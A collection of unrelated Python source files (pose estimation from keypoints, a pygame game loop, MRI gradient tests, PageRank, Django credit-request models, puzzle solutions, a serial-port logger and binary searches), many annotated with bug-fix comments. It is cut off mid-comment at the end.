        # update shape
        if len(pc) == 0:
            C0 = estimateC_weighted(W2fit, R, B, D, 1e-3)[0]
            S = C0 * B
        else:
            # BUG FIX: 'eye(3)' was an undefined name here (NameError as
            # soon as the model has principal components); it must be
            # np.eye(3).
            W_1 = W2fit - np.dot(np.dot(R, np.kron(C, np.eye(3))), pc)
            C0 = estimateC_weighted(W_1, R, B, D, 1e-3)
            W_2 = W2fit - np.dot(np.dot(R, C0), B)
            C = estimateC_weighted(W_2, R, pc, D, lam)
            S = np.dot(C0, B) + np.dot(np.kron(C, np.eye(3)), pc)
        fvaltml = fval
        # fval = 0.5*norm((W2fit-R*S)*sqrt(D),'fro')^2 + 0.5*norm(C)^2
        fval = 0.5 * np.linalg.norm(np.dot(W2fit - np.dot(R, S), np.sqrt(D)), 'fro') ** 2 \
            + 0.5 * np.linalg.norm(C) ** 2
        # show output
        if verb:
            print('Iter = ', iter, 'fval = ', fval)
        # check convergence
        if np.abs(fval - fvaltml) / (fvaltml + eps) < tol:
            break
    # end iteration: complete R to a full rotation via the cross product
    R2 = np.zeros((3, 3))
    R2[0, :] = R[0, :]
    R2[1, :] = R[1, :]
    R2[2, :] = np.cross(R[0, :], R[1, :])
    output = Output(S=S, M=M, R=R2, C=C, C0=C0, T=T, fval=fval)
    return output
def PoseFromKpts_FP(W, dict, R0=None, weight=None, verb=True, lam=1, tol=1e-10):
    '''
    Compute the pose under a full-perspective camera model.

    Solves min ||W*diag(Z)-R*S-T||^2 + ||C||^2 where Z denotes the depth
    of the points, by alternating the depth update with a weighted
    Procrustes alignment of S to W*diag(Z).

    :param W: 3 x p normalized homogeneous keypoint responses
    :param dict: the cad model template (provides mu and pc)
    :param R0: initial rotation (required in practice)
    :param weight: optional per-keypoint weights (defaults to identity)
    :param verb: print per-iteration diagnostics
    :param lam: weight of the ||C||^2 term in the reported objective
    :param tol: convergence tolerance
    :return: an Output object with S, R, C, T, Z and fval
    '''
    # data size
    mu = np.copy(dict.mu)  # mean shape (basis)
    pc = np.copy(dict.pc)  # principal components (unused in this solver)
    R = np.copy(R0)
    # setting values
    if weight is None:
        # BUG FIX: this branch referenced an undefined name 'p'
        # (NameError); the point count is the number of columns of W.
        D = np.eye(W.shape[1])
    else:
        D = np.diag(weight)
    # centralize basis
    meanmu = np.mean(mu, 1)
    for i in range(mu.shape[0]):
        mu[i] -= meanmu[i]
    # initialization
    eps = sys.float_info.epsilon
    S = mu
    # rough translation guess matching the spread of the projected shape
    T = np.mean(W, 1) * np.mean(np.std(np.dot(R[0:2, :], S), 1)) / (np.mean(np.std(W, 1)) + eps)
    C = 0
    fval = np.inf
    # iteration
    for iter in range(1000):
        # update the depths Z by projecting R*S+T onto the rays W
        Z = np.dot(R, S)
        for j in range(3):
            Z[j] += T[j]
        Z = np.sum(W * Z, 0) / (np.sum(W ** 2, 0) + eps)
        # update R and T by aligning S to W*diag(Z) (weighted Procrustes)
        Sp = np.dot(W, np.diag(Z))
        T = np.sum(np.dot(Sp - np.dot(R, S), D), 1) / (np.sum(np.diag(D)) + eps)
        St = Sp
        for j in range(Sp.shape[0]):
            St[j] -= T[j]
        [U, _, V] = np.linalg.svd(np.dot(St, np.dot(D, np.transpose(S))))
        # enforce det(R) = +1 (proper rotation, no reflection)
        R = np.dot(np.dot(U, np.diag([1, 1, np.linalg.det(np.dot(U, V))])), V)
        fvaltml = fval
        fval = np.linalg.norm(np.dot(St - np.dot(R, S), np.sqrt(D)), 'fro') ** 2 \
            + lam * np.linalg.norm(C) ** 2
        # show output
        if verb:
            print('Iter = ', iter, 'fval = ', fval)
        # check convergence
        if np.abs(fval - fvaltml) / (fvaltml + eps) < tol:
            break
    output = Output(S=S, R=R, C=C, T=T, Z=Z, fval=fval)
    return output
def findRotation(S1, S2):
    '''
    Find the rotation best aligning two stacked point sets (orthogonal
    Procrustes with reflection correction).

    :param S1: 3f x p stacked shape matrix
    :param S2: 3f x p stacked shape matrix
    :return: R, a proper 3x3 rotation (det(R) = +1)
    '''
    frames, points = S1.shape
    frames = int(frames / 3)
    A = np.reshape(S1, (3, frames * points))
    B = np.reshape(S2, (3, frames * points))
    # Cross-covariance followed by SVD. /!\ numpy's svd returns V already
    # transposed compared with MATLAB's convention.
    U, _, Vt = np.linalg.svd(np.dot(A, np.transpose(B)))
    # Correct a possible reflection so the result is a proper rotation.
    flip = np.linalg.det(np.dot(U, Vt))
    return np.dot(U, np.dot(np.diag([1.0, 1.0, flip]), Vt))
def fullShape(S1, model):
    '''
    Align the CAD model to the estimated shape S1 with a similarity
    transform (rotation, isotropic scale, translation) and return the
    transformed model.

    NOTE: S1 is centred in place, so the caller's array is modified.

    :param S1: 3 x p estimated keypoint shape
    :param model: a Model object exposing kp and vertices
    :return: [model_new, w, R, T] — the transformed model, the scale, the
             rotation and the translation
    '''
    eps = sys.float_info.epsilon
    S2 = np.copy(np.transpose(model.kp))
    # Centre both point sets (S1 is modified in place, as before).
    T1 = np.mean(S1, 1)
    T2 = np.mean(S2, 1)
    for axis in range(len(T1)):
        S1[axis] -= T1[axis]
        S2[axis] -= T2[axis]
    R = findRotation(S1, S2)
    S2 = np.dot(R, S2)
    # Optimal isotropic scale, then the translation mapping model -> S1.
    w = np.trace(np.dot(np.transpose(S1), S2)) / (np.trace(np.dot(np.transpose(S2), S2)) + eps)
    T = T1 - w * np.dot(R, T2)
    # Apply the similarity transform to every vertex of the CAD model.
    vertices = np.transpose(model.vertices)
    for axis in range(len(T)):
        vertices[axis] = vertices[axis] - T2[axis]
    vertices = w * np.dot(R, vertices)
    for axis in range(len(T)):
        vertices[axis] = vertices[axis] + T1[axis]
    model_new = model.copy()
    model_new.vertices = np.transpose(vertices)
    model_new.nb_vertices = len(vertices)
    return [model_new, w, R, T]
def get_transform(center, scale, res):
    '''
    Build the 3x3 affine matrix mapping original-image coordinates into
    the cropped/scaled frame of resolution *res*.

    :param center: (x, y) centre of the crop in the original image
    :param scale: crop scale; the crop window is 200*scale pixels wide
    :param res: output resolution as (rows, cols)
    :return: the 3x3 transform matrix
    '''
    h = 200 * scale
    t = np.eye(3)
    t[0, 0] = res[1] / h
    t[1, 1] = res[0] / h
    t[0, 2] = res[1] * (-center[0] / h + 0.5)
    # BUG FIX: the y offset used center[0]; it must use center[1] so the
    # vertical mapping is centred on the crop centre's y coordinate.
    # (All callers in this file pass a square-centred crop where
    # center[0] == center[1], so their results are unchanged.)
    t[1, 2] = res[0] * (-center[1] / h + 0.5)
    t[2, 2] = 1
    return t
def transformHG(pt,center,scale,res,invert):
    '''
    Map 2-D points between heatmap coordinates and original-image
    coordinates using the affine transform from get_transform.

    :param pt: 3 x N point array (the third row is overwritten with ones)
    :param center: crop centre, forwarded to get_transform
    :param scale: crop scale, forwarded to get_transform
    :param res: heatmap resolution (rows, cols)
    :param invert: if True, apply the inverse mapping
    :return: the transformed points (2 x N)
    '''
    t = get_transform(center,scale,res)
    if invert:
        t = np.linalg.inv(t)
    new_pt = np.zeros(pt.shape)
    new_pt[0] = pt[0]
    # NOTE(review): only the y coordinate is shifted by -0.5 (x is not);
    # reference implementations usually offset both axes identically —
    # confirm against the original MATLAB before changing.
    new_pt[1] = pt[1] - 0.5
    # Homogeneous coordinate for the affine multiply below.
    new_pt[2] = np.ones(new_pt[2].shape)
    new_pt = np.dot(t,new_pt)
    return new_pt[0:2]
def mesh_kpts(image_name,verbosity=True, lam=1, tol=1e-10):
    '''
    take the image name and return the croped image, the image of the heatmap and the meshs of the cad model
    :param image_name : the path/name of the image
    :param verbosity : print or not some indermediate results
    :param lam : usualy 1
    :param tol : a little value used in convergence tests
    :return : [cropped_image, heatmap, mesh2d_wp, mesh2d_fp, R_fp, T_fp]
    '''
    # loading the cad model
    cad = Model()
    cad.load_model()
    # build the template (mean shape + principal components) from the CAD model
    dict = Template(cad)
    # read heatmap and detect maximal responses (8 keypoints)
    heatmap = readHM(image_name, 8)
    [W_hp, score] = findWMax(heatmap);
    print(W_hp,"\n")
    print(score,"\n")
    # Camera intrinsics: focal length rescaled from the 640px image down to
    # the 64px heatmap, plus fixed principal-point offsets.
    # NOTE(review): the magic constants (319.4593, 15.013, 64.8108) look
    # like calibration values for one specific camera — confirm before
    # reusing this function with other inputs.
    lens_f = 319.4593
    lens_f_rescale = lens_f / 640.0 * 64.0
    W_hp[0] = W_hp[0] + 15.013 / 640.0 * 64.0
    W_hp[1] = W_hp[1] - 64.8108 / 640 * 64.0
    # normalized homogeneous coordinates for the full-perspective solver
    W_hp_norm = np.ones([3, len(W_hp[0])])
    W_hp_norm[0] = (W_hp[0] - 32.0) / lens_f_rescale
    W_hp_norm[1] = (W_hp[1] - 32.0) / lens_f_rescale
    # pose estimation weak perspective
    opt_wp = PoseFromKpts_WP(W_hp, dict, weight=score, verb=verbosity, lam=lam, tol=tol)
    # pose estimation full perspective (initialized from the WP rotation)
    opt_fp = PoseFromKpts_FP(W_hp_norm, dict, R0=opt_wp.R, weight=score, verb=verbosity, lam=1, tol=1e-10);
    lens_f_cam = lens_f_rescale * 4
    K_cam = [[lens_f_cam, 0, 128], [0, lens_f_cam, 128], [0, 0, 1]]
    # we use cv2 to read the image to use the cv2 function later
    img = cv2.imread(image_name)
    # crop image
    center = [128, 128]
    scale = 1.28
    # NOTE(review): the return value of cropImage is discarded, so the crop
    # has no effect — the raw image is resized below instead. Confirm
    # whether `img = cropImage(img, center, scale)` was intended.
    cropImage(img, center, scale)
    img_crop = cv2.resize(img, (200, 200)) / 255.0
    # weak perspective: project the shape and apply the 2D translation
    S_wp = np.dot(opt_wp.R, opt_wp.S)
    S_wp[0] += opt_wp.T[0]
    S_wp[1] += opt_wp.T[1]
    # full perspective: project and translate in 3D
    S_fp = np.dot(opt_fp.R,opt_fp.S)
    for i in range(S_fp.shape[0]):
        S_fp[i] += opt_fp.T[i]
    # computation of the polygon weak perspective
    [model_wp, _, _, _] = fullShape(S_wp, cad)
    mesh2d_wp = np.transpose(model_wp.vertices[:, 0:2]) * 200 / heatmap.shape[1]
    # adding the camera parameters (undo the principal-point offsets)
    mesh2d_wp[0] += -15.013 / 3.2
    mesh2d_wp[1] += 64.8108 / 3.2
    # computation of the polygon full perspective
    [model_fp, _, _, _] = fullShape(S_fp, cad)
    mesh2d_fp = np.dot(K_cam,np.transpose(model_fp.vertices))
    # perspective divide, then map heatmap coordinates to the 200px crop
    mesh2d_fp[0] /= mesh2d_fp[2]
    mesh2d_fp[1] /= mesh2d_fp[2]
    mesh2d_fp = transformHG(mesh2d_fp, center, scale, heatmap.shape[0:2], False) * 200 / heatmap.shape[1]
    mesh2d_fp[0] += -15.013 / 3.2
    mesh2d_fp[1] += 64.8108 / 3.2
    # computation of the sum of the heatmap, normalized to [0, 1] for display
    response = np.sum(heatmap, 2)
    max_value = np.amax(response)
    min_value = np.amin(response)
    response = (response - min_value) / (max_value - min_value)
    cmap = plt.get_cmap('jet')
    # colour-map the response and drop the alpha channel
    mapIm = np.delete(cv2.resize(cmap(response), (200, 200)), 3, 2)
    return [img_crop, mapIm, np.transpose(mesh2d_wp), np.transpose(mesh2d_fp), opt_fp.R, opt_fp.T]
|
__author__ = 'yuvv'
import json
from sys import exit as sys_exit
import plane
import pygame
from pygame.locals import *
# global variables
SCREEN_W, SCREEN_H = 480, 768

# pygame init
pygame.mixer.init()
pygame.init()
screen = pygame.display.set_mode((SCREEN_W, SCREEN_H),
                                 pygame.FULLSCREEN | pygame.DOUBLEBUF)
pygame.display.set_caption('plain!')

# load resources (Windows-style relative paths; run from the project root)
SOUND_EXPLOSION = pygame.mixer.Sound('res\\sound\\explosion.ogg')
SOUND_SHOOT = pygame.mixer.Sound('res\\sound\\shoot.ogg')
IMG_PLANES = pygame.image.load('res\\img\\plane.png').convert_alpha()
# sprite-sheet metadata: maps sprite names to sub-surface rects
IMG_PLANES_SUB_iNFO = json.load(open('res\\img\\plane.json'))
IMG_BG1 = pygame.image.load('res\\img\\bg_01.jpg').convert()
IMG_BG2 = pygame.image.load('res\\img\\bg_02.jpg').convert()
# TODO: add other images

# control frame speed
clock = pygame.time.Clock()
# USEREVENT+1 fires every 500 ms (used in the loop below for shooting)
pygame.time.set_timer(USEREVENT + 1, 500)
player = plane.Plane(IMG_PLANES.subsurface(IMG_PLANES_SUB_iNFO['hero_1']),
                     (SCREEN_W / 2, SCREEN_H / 2))
self_items = pygame.sprite.Group()   # every friendly sprite currently on screen
enemy_items = pygame.sprite.Group()  # every enemy sprite currently on screen
# main event loop
while True:
    for event in pygame.event.get():
        if event.type == QUIT:
            pygame.quit()
            sys_exit()
        elif event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys_exit()
        elif event.type == USEREVENT + 1:
            # periodic 500 ms tick: enemy spawning / bullet creation is
            # currently disabled, only the shoot sound plays
            # enemy_items = utils.util.create_enemy(enemy_items, 'enemy_s')
            # self_items.add(player.shoot(Bullet('bullet_1')))
            SOUND_SHOOT.play()
    # cap the frame rate at 60 fps; passed_ms is the time since last frame
    passed_ms = clock.tick(60)
    # arrow-key handling: d_x/d_y become the movement direction
    key_pressed = pygame.key.get_pressed()
    d_x, d_y = 0, 0
    if key_pressed[K_LEFT]:
        d_x = -1
    elif key_pressed[K_RIGHT]:
        d_x = 1
    if key_pressed[K_UP]:
        d_y = -1
    elif key_pressed[K_DOWN]:
        d_y = 1
    # draw the player's side of the screen
    screen.blit(IMG_BG1, IMG_BG1.get_rect())
    player.update(passed_ms, d_x, d_y, SCREEN_W, SCREEN_H)
    # NOTE(review): pygame.Rect has no 'pos' attribute; this relies on the
    # project's plane.Plane providing rect.pos — confirm, otherwise blit at
    # player.rect directly.
    screen.blit(player.image, player.rect.pos)
    # handle friendly bullets hitting enemies
    for my_bullet in self_items:
        if my_bullet != player:
            enemy_hit_list = pygame.sprite.spritecollide(my_bullet, enemy_items, True, pygame.sprite.collide_mask)
            if len(enemy_hit_list):
                self_items.remove(my_bullet)
                for dead in enemy_hit_list:
                    # if isinstance(dead, Plane):
                    #     enemy_items.add(utils.util.Explosion(dead.get_pos()))
                    SOUND_EXPLOSION.play()
                enemy_hit_list.clear()
    # update display window
    pygame.display.update()
|
import math
import unittest
import numpy as np
import numpy.testing as npt
import sigpy.mri.rf as rf
class TestTrajGrad(unittest.TestCase):
    """Tests for sigpy.mri.rf gradient/trajectory design routines."""

    def test_min_gradient(self):
        # Design a time-optimal gradient for a helical k-space trajectory
        # and check the total duration against the known-good value.
        t = np.linspace(0, 1, 1000)
        kx = np.sin(2.0 * math.pi * t)
        ky = np.cos(2.0 * math.pi * t)
        kz = t
        k = np.stack((kx, ky, kz), axis=-1)
        (g, k, s, t) = rf.min_time_gradient(
            k, 0.0, 0.0, gmax=4, smax=15, dt=4e-3, gamma=4.257
        )
        npt.assert_almost_equal(np.max(t), 0.916, decimal=4)

    def test_trap_grad(self):
        # A trapezoidal gradient must integrate to the requested area and
        # respect the amplitude limit.
        dt = 4e-6  # s
        area = 200 * dt
        dgdt = 18000  # g/cm/s
        gmax = 2  # g/cm
        trap, _ = rf.trap_grad(area, gmax, dgdt, dt)
        npt.assert_almost_equal(area, np.sum(trap) * dt, decimal=3)
        npt.assert_almost_equal(gmax, np.max(trap), decimal=1)

    def test_min_trap_grad(self):
        # Same invariants for the minimal-duration trapezoid.
        dt = 4e-6  # s
        area = 200 * dt
        dgdt = 18000  # g/cm/s
        gmax = 2  # g/cm
        trap, _ = rf.min_trap_grad(area, gmax, dgdt, dt)
        npt.assert_almost_equal(area, np.sum(trap) * dt, decimal=3)
        npt.assert_almost_equal(gmax, np.max(trap), decimal=1)


# BUG FIX: this guard used to sit ABOVE the class definition, so running
# the file directly invoked unittest.main() before TestTrajGrad existed
# and zero tests were collected. It must come after the class.
if __name__ == "__main__":
    unittest.main()
|
import numpy as np
import scipy.sparse.linalg as linalg
def get_pagerank(transition_prob_matrix, alpha=0.85):
    """Rank nodes by the dominant eigenvector of the damped link matrix.

    Parameters
    ----------
    transition_prob_matrix : (n, n) array
        Column-stochastic link matrix; NOT modified by this call.
    alpha : float
        Uniform teleport weight added as ``alpha / n`` to every entry.

    Returns
    -------
    (ranking, probs) : (ndarray, ndarray)
        Node indices sorted by descending probability, and the normalized
        probability vector itself (real-valued).
    """
    n = len(transition_prob_matrix)
    # BUG FIX: build the damped matrix out-of-place; the original used `+=`,
    # which silently mutated the caller's matrix.
    damped = transition_prob_matrix + np.ones([n, n]) * alpha / n
    lamb, v = linalg.eigs(damped, k=1)
    # BUG FIX: eigs returns a complex array even for real input; keep the
    # real part so callers receive float probabilities.
    P = np.real(v[:, 0])
    P /= P.sum()
    return np.argsort(P)[::-1], P
def get_easy_pagerank(transition_prob_matrix, err_dist=0.0001, alpha=0.85):
    """Accelerated power iteration for PageRank.

    Parameters
    ----------
    transition_prob_matrix : (n, n) array
        Column-stochastic link matrix; NOT modified by this call.
    err_dist : float
        L1 convergence tolerance between successive iterates.
    alpha : float
        Uniform teleport weight added as ``alpha / n`` to every entry.

    Returns
    -------
    (ranking, probs) : (ndarray, ndarray)
        Node indices by descending probability, and the probability vector.
    """
    n = len(transition_prob_matrix)
    # BUG FIX: build the damped matrix out-of-place; `+=` mutated the
    # caller's matrix.
    damped = transition_prob_matrix + np.ones([n, n]) * alpha / n
    P = np.array([1 / n] * n).reshape(n, 1)
    while True:
        prev = P.copy()
        P = damped.dot(P)
        P /= P.sum()
        err = np.abs(P - prev).sum()
        if err <= err_dist:
            break
        # Squaring the matrix doubles the number of implicit power steps per
        # iteration, accelerating convergence.
        damped = damped.dot(damped)
    P = np.array(P.T)[0]
    return np.argsort(P)[::-1], P
if __name__ == '__main__':
    # Column-stochastic link matrix of a 7-node demo graph
    # (entry [i][j] = probability of moving from page j to page i).
    M = np.array([[0, 1, 1. / 2, 0, 1. / 4, 1. / 2, 0],
                  [1. / 5, 0, 1. / 2, 1. / 3, 0, 0, 0],
                  [1. / 5, 0, 0, 1. / 3, 1. / 4, 0, 0],
                  [1. / 5, 0, 0, 0, 1. / 4, 0, 0],
                  [1. / 5, 0, 0, 1. / 3, 0, 1. / 2, 1],
                  [0, 0, 0, 0, 1. / 4, 0, 0],
                  [1. / 5, 0, 0, 0, 0, 0, 0]])
    # alpha=0 disables damping, so both methods rank by raw link structure.
    print("get pagerank------------------")
    print("Rank | ID | Prob")
    r, p = get_pagerank(M, alpha=0)
    for i in range(len(r)):
        print(f'{i+1} | {r[i]+1} | {p[r[i]]}')
    print("get easy pagerank-------------")
    print("Rank | ID | Prob")
    r, p = get_easy_pagerank(M, alpha=0)
    for i in range(len(r)):
        print(f'{i+1} | {r[i]+1} | {p[r[i]]}')
from django.db import models
from datetime import datetime
from applicant import Applicant
from django.conf import settings
class CreditRequest(models.Model):
    '''
    Represents a REQUEST to run credit one or more times for an applicant.
    Belongs to an applicant so that we know which applicant and agreement,
    specifically, we actually ran credit for.
    '''
    # NOTE(review): ForeignKey without on_delete implies Django < 2.0 --
    # confirm the target version before upgrading.
    applicant = models.ForeignKey(Applicant)
    # person_id is used to identify the name/social used to run it.
    person_id = models.CharField(max_length=64)
    # Name and last four SSN digits as submitted on this request.
    name = models.CharField(max_length=64)
    last_4 = models.CharField(max_length=4)
    # The social is stored in social_data, encrypted with the social_data_key
    # and encoded as base64. The full social is destroyed as soon as it
    # is no longer needed.
    social_data = models.TextField(null=True, blank=True, default=None)
    social_data_key = models.TextField(null=True, blank=True)
    # comma separated list of bureaus on which to run the request.
    bureaus = models.CharField(max_length=64)
    # Stop running bureaus if you get a response that is at least this value.
    stop_running_at_beacon = models.IntegerField(null=True, blank=True)
    # Presumably the approval threshold score (copied from settings) -- confirm.
    approved_at_beacon = models.IntegerField()
    # When and where this was run.
    insert_date = models.DateTimeField(auto_now_add=True)
    processed_date = models.DateTimeField(blank=True, null=True)
    # NOTE(review): auto_now and auto_now_add together are rejected by modern
    # Django system checks (mutually exclusive); auto_now alone also stamps
    # creation -- confirm before changing.
    modified_date = models.DateTimeField(auto_now=True, auto_now_add=True)
    processor_pid = models.IntegerField(blank=True, null=True)
    processed = models.BooleanField(default=False)
    error = models.BooleanField(default=False)
    # need to store these things
    first_name = models.CharField(max_length=64)
    last_name = models.CharField(max_length=64)
    address = models.CharField(max_length=80)
    city = models.CharField(max_length=50)
    state = models.CharField(max_length=25)
    zipcode = models.CharField(max_length=10)
    country_code = models.CharField(max_length=10)

    @staticmethod
    def create_request(applicant):
        """Build and save a CreditRequest snapshot from an applicant.

        Copies the applicant's system address, name, person_id and (already
        encrypted) social data onto the request, applies the credit settings
        from django.conf.settings, saves the row and returns it.
        """
        req = CreditRequest()
        req.applicant = applicant
        agreement = applicant.agreement
        system_address = agreement.system_address
        # we need this person's SYSTEM address to run their credit
        req.address = ' '.join([system_address.street1, system_address.street2])
        req.city = system_address.city
        req.state = system_address.state
        req.zipcode = system_address.zip
        req.country_code = system_address.country
        # obtain their name
        req.first_name = applicant.first_name
        req.last_name = applicant.last_name
        req.last_4 = applicant.last_4
        req.name = ' '.join(filter(None, [applicant.first_name, applicant.last_name]))
        # call out to generate_person_id
        req.person_id = applicant.person_id
        req.social_data, req.social_data_key = applicant.social_data, applicant.social_data_key
        # encrypt social data
        #req.social_data, req.social_data_key = settings.SOCIAL_CIPHER.encrypt_long_encoded(social)
        # credit settings
        req.bureaus = settings.CREDIT_BUREAUS
        req.approved_at_beacon = settings.CREDIT_APPROVED_BEACON
        req.stop_running_at_beacon = settings.STOP_RUNNING_AT_BEACON
        # save and return
        req.save()
        return req

    class Meta:
        verbose_name = "Credit Request"
        app_label = 'agreement'
class CreditFile(models.Model):
    '''
    Represents the results of a CreditRequest. These belong to an applicant,
    but may be duplicated onto another applicant if one exists within the
    correct timeframe, skipping the CreditRequest step.
    '''
    # A given applicant should always have its own credit files.
    # It may have one per bureau? We need to look at this.
    # Credit files are not reused or shared among applicants. They'll be
    # copied instead, by using the person_id ( below)
    applicant = models.ForeignKey(Applicant, related_name='credit_file')
    # person_id is used to identify the name/social used to run it.
    person_id = models.CharField(max_length=128)
    name = models.CharField(max_length=64)
    # NOTE(review): last_4 is an IntegerField here but a CharField(4) on
    # CreditRequest; an integer drops leading zeros -- confirm.
    last_4 = models.IntegerField()
    # Then, a new file can be created by COPYING this one if the person_id
    # matches.
    copy_of_file = models.ForeignKey('self', null=True, blank=True, related_name='files')
    # The CreditRequest that generated this credit file, or null if it was a copy.
    # (We can always find it from copy_of_file, and storing a null prevents
    # duplicates from showing in the run's .files list.)
    run_request = models.ForeignKey('CreditRequest', null=True, blank=True)
    # The time that this file was generated.
    generated_date = models.DateTimeField()
    # The result information.
    bureau = models.CharField(max_length=20)
    beacon = models.IntegerField(null=True, blank=True)
    fraud = models.BooleanField(default=False)
    frozen = models.BooleanField(default=False)
    nohit = models.BooleanField(default=False)
    vermont = models.BooleanField(default=False)
    status_string = models.CharField(max_length=20)
    # bookkeeping
    transaction_id = models.CharField(max_length=64)
    transaction_status = models.CharField(max_length=20)
    # address
    address = models.CharField(max_length=80)
    city = models.CharField(max_length=50)
    state = models.CharField(max_length=25)
    zipcode = models.CharField(max_length=10)
    country_code = models.CharField(max_length=10)

    # Python 2 / Django 1.x repr hook; __str__ is the Python 3 spelling.
    def __unicode__(self):
        return "CreditFile(name=%r, bureau=%r, beacon=%r, status_string=%r)" % (
            self.name, self.bureau, self.beacon, self.status_string)

    def as_jsonable(self):
        """Return a plain dict of the display fields for serialization."""
        jsonable = {
            field: getattr(self, field)
            for field in ('name', 'bureau', 'fraud', 'frozen', 'nohit', 'vermont', 'beacon', 'generated_date', 'status_string')
        }
        return jsonable

    #@property
    #def another_status_string(self):
    #    if self.fraud or self.frozen or self.vermont:
    #        return 'REVIEW'
    #    if self.nohit:
    #        return 'NO HIT'
    #    if self.beacon >= settings.CREDIT_APPROVED_BEACON:
    #        return 'APPROVED'
    #    return 'DCS'

    class Meta:
        verbose_name = "Credit File"
        app_label = 'agreement'
from nummath import isPrime,primesWithin
# Project Euler 27: maximise the run n = 0, 1, 2, ... for which
# n**2 + a*n + b is prime, with |a| <= 1000 and b a prime below 1000
# (b must itself be prime because n = 0 yields b).
brange = primesWithin(1000)
nmax = 0
amax = 0
bmax = 0
# FIX: reuse the precomputed prime list; the original computed it into an
# unused variable and then called primesWithin(1000) again in the loop.
for b in brange:
    for a in range(-1000, 1001):
        n = 0
        while isPrime(n**2 + a*n + b):
            n = n + 1
        if n > nmax:
            amax = a
            bmax = b
            nmax = n
# Product of the coefficients of the best quadratic.
print(amax*bmax)
|
#import sys
#input = sys.stdin.readline
def main():
    """Enumerate all strings reachable from "AB" by pair-insertion.

    Reads four characters (C_AA, C_AB, C_BA, C_BB) from one stdin line.
    Between every adjacent pair of characters the corresponding character is
    inserted; each generation's reachable set is printed.
    """
    N = 10
    CAA, CAB, CBA, CBB = list(input())
    # Insertion rule keyed by the adjacent character pair.
    insert_for = {"AA": CAA, "AB": CAB, "BA": CBA, "BB": CBB}
    S = set(["AB"])
    for length in range(2, N):
        grown = set()
        for word in S:
            for pos in range(length - 1):
                grown.add(word[:pos + 1] + insert_for[word[pos:pos + 2]] + word[pos + 1:])
        S = grown
        print(length + 1, len(S), S)


if __name__ == '__main__':
    main()
|
import serial
from time import gmtime, strftime
import time
import sys
import os
#----------------------------------------------------------------
# Ask for the COM port until a serial connection can be opened.
port = input("COM-Port: ")
w = 1
while w:
    try:
        ser = serial.Serial("Com" + port,19200,timeout=0)
        w = 0
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt -- confirm.
        print("Fehler bei Verbindung!")  # German: "connection error"
        port = input("COM-Port: ")
        w = 1
#----------------------------------------------------------------
# Ensure the .\DATA\ output directory exists next to the script.
try:
    pfad = os.path.abspath(".") + "\DATA\\"
    if not os.path.isdir(pfad):
        os.mkdir(pfad)
except:
    a = input("Fehler beim Zugriff auf Pfad")  # German: "error accessing path"
    sys.exit()
# Ask for a measurement-series title until the CSV log can be opened.
titel = input("Titel der Messreihe: ")
w = 1
while w:
    try:
        fobj_out = open(pfad + titel + ".csv","a")
        fobj_out.write("LOG\n")
        fobj_out.close()
        print("Log wird gespeicher unter: \n" + pfad + titel + ".csv")  # "log is saved under ..."
        w = 0
    except:
        print("Fehler beim Zugriff auf Datei")  # German: "error accessing file"
        titel = input("Anderer Dateiname: ")
        w = 1
#----------------------------------------------------------------
intervall = input("Intervall: ")  # polling interval, seconds (string; cast below)
#----------------------------------------------------------------
print("Beginn der Messung: " + time.strftime("%d.%m.%Y um %H:%M:%S Uhr"))
z = 0  # bytes received during the current interval
#----------------------------------------------------------------
# Main loop: every `intervall` seconds, count the bytes waiting on the
# serial port and append a "timestamp;count" CSV row (timestamps in UTC).
while 1:
    sys.stdout.flush()
    time.sleep(float(intervall))
    while ser.inWaiting() > 0:
        x = ser.read()
        z = z + 1
    fobj_out = open(pfad + titel + ".csv","a")
    fobj_out.write(strftime("%Y-%m-%d %H:%M:%S", gmtime()) + ";" + str(z) + '\n')
    fobj_out.close()
    z = 0
|
class Solution(object):
    def letterCasePermutation(self, S):
        """
        :type S: str
        :rtype: List[str]

        Return every string obtainable from S by independently choosing the
        case of each letter; digits and other caseless characters are kept
        as-is.
        """
        res = [""]
        S = S.lower()
        for ch in S:
            # BUG FIX: the original tested `not ch in '1234567890'`, which
            # branched on ANY non-digit; for caseless characters such as '-'
            # (where ch == ch.upper()) that produced duplicate results.
            # isalpha() branches only on cased letters.
            if ch.isalpha():
                res = [c + ch for c in res] + [c + ch.upper() for c in res]
            else:
                res = [c + ch for c in res]
        return res
def get_first_k(arr, length, start, end, k):
    """Binary search for the index of the FIRST occurrence of k in the
    sorted list arr, searching arr[start:end+1]; returns -1 if absent."""
    # BUG FIX: guard against an empty search range.  Without it, a key
    # smaller than every element drove `end` negative; the negative `mid`
    # then wrapped around (arr[-1]) and the function recursed forever.
    if start > end:
        return -1
    # If the very first element matches, it is trivially the first occurrence.
    if start == 0 and arr[start] == k:
        return 0
    if start == end:
        return start if arr[start] == k else -1
    mid = (end + start) // 2
    # A match whose left neighbour differs is the first occurrence.
    if arr[mid] == k and arr[mid - 1] != k:
        return mid
    if k <= arr[mid]:
        return get_first_k(arr, length, start, mid - 1, k)
    else:
        return get_first_k(arr, length, mid + 1, end, k)
def get_last_k(arr, length, start, end, k):
    """Binary search for the index of the LAST occurrence of k in the
    sorted list arr, searching arr[start:end+1]; returns -1 if absent."""
    # BUG FIX: guard against an empty search range; previously a key with no
    # admissible position recursed forever via negative wrap-around indices.
    if start > end:
        return -1
    # If the very last element matches, it is trivially the last occurrence.
    if end == length - 1 and arr[end] == k:
        return end
    if start == end:
        return end if arr[end] == k else -1
    mid = (end + start) // 2
    # A match whose right neighbour differs is the last occurrence.
    if arr[mid] == k and arr[mid + 1] != k:
        return mid
    if arr[mid] <= k:
        return get_last_k(arr, length, mid + 1, end, k)
    else:
        return get_last_k(arr, length, start, mid - 1, k)
def solution(arr, k):
    """Count occurrences of k in the sorted list arr by locating its first
    and last positions with two binary searches."""
    if not arr:
        return 0
    n = len(arr)
    lo = get_first_k(arr, n, 0, n - 1, k)
    hi = get_last_k(arr, n, 0, n - 1, k)
    # Both bounds found -> count is the closed-interval width, else zero.
    return hi - lo + 1 if lo > -1 and hi > -1 else 0
def get_first_k2(arr, length, start, end, k):
    """Alternative binary search for the FIRST occurrence of k in the sorted
    list arr within [start, end]; returns -1 if absent."""
    if start > end:
        return -1
    mid = (start + end) // 2
    mid_data = arr[mid]
    if mid_data == k:
        # First occurrence iff at index 0 or the left neighbour differs.
        if (mid > 0 and arr[mid - 1] != k) or mid == 0:
            return mid
        else:
            end = mid - 1
    elif mid_data > k:
        end = mid - 1
    else:
        start = mid + 1
    # BUG FIX: the recursive call originally passed (arr, length, k, start,
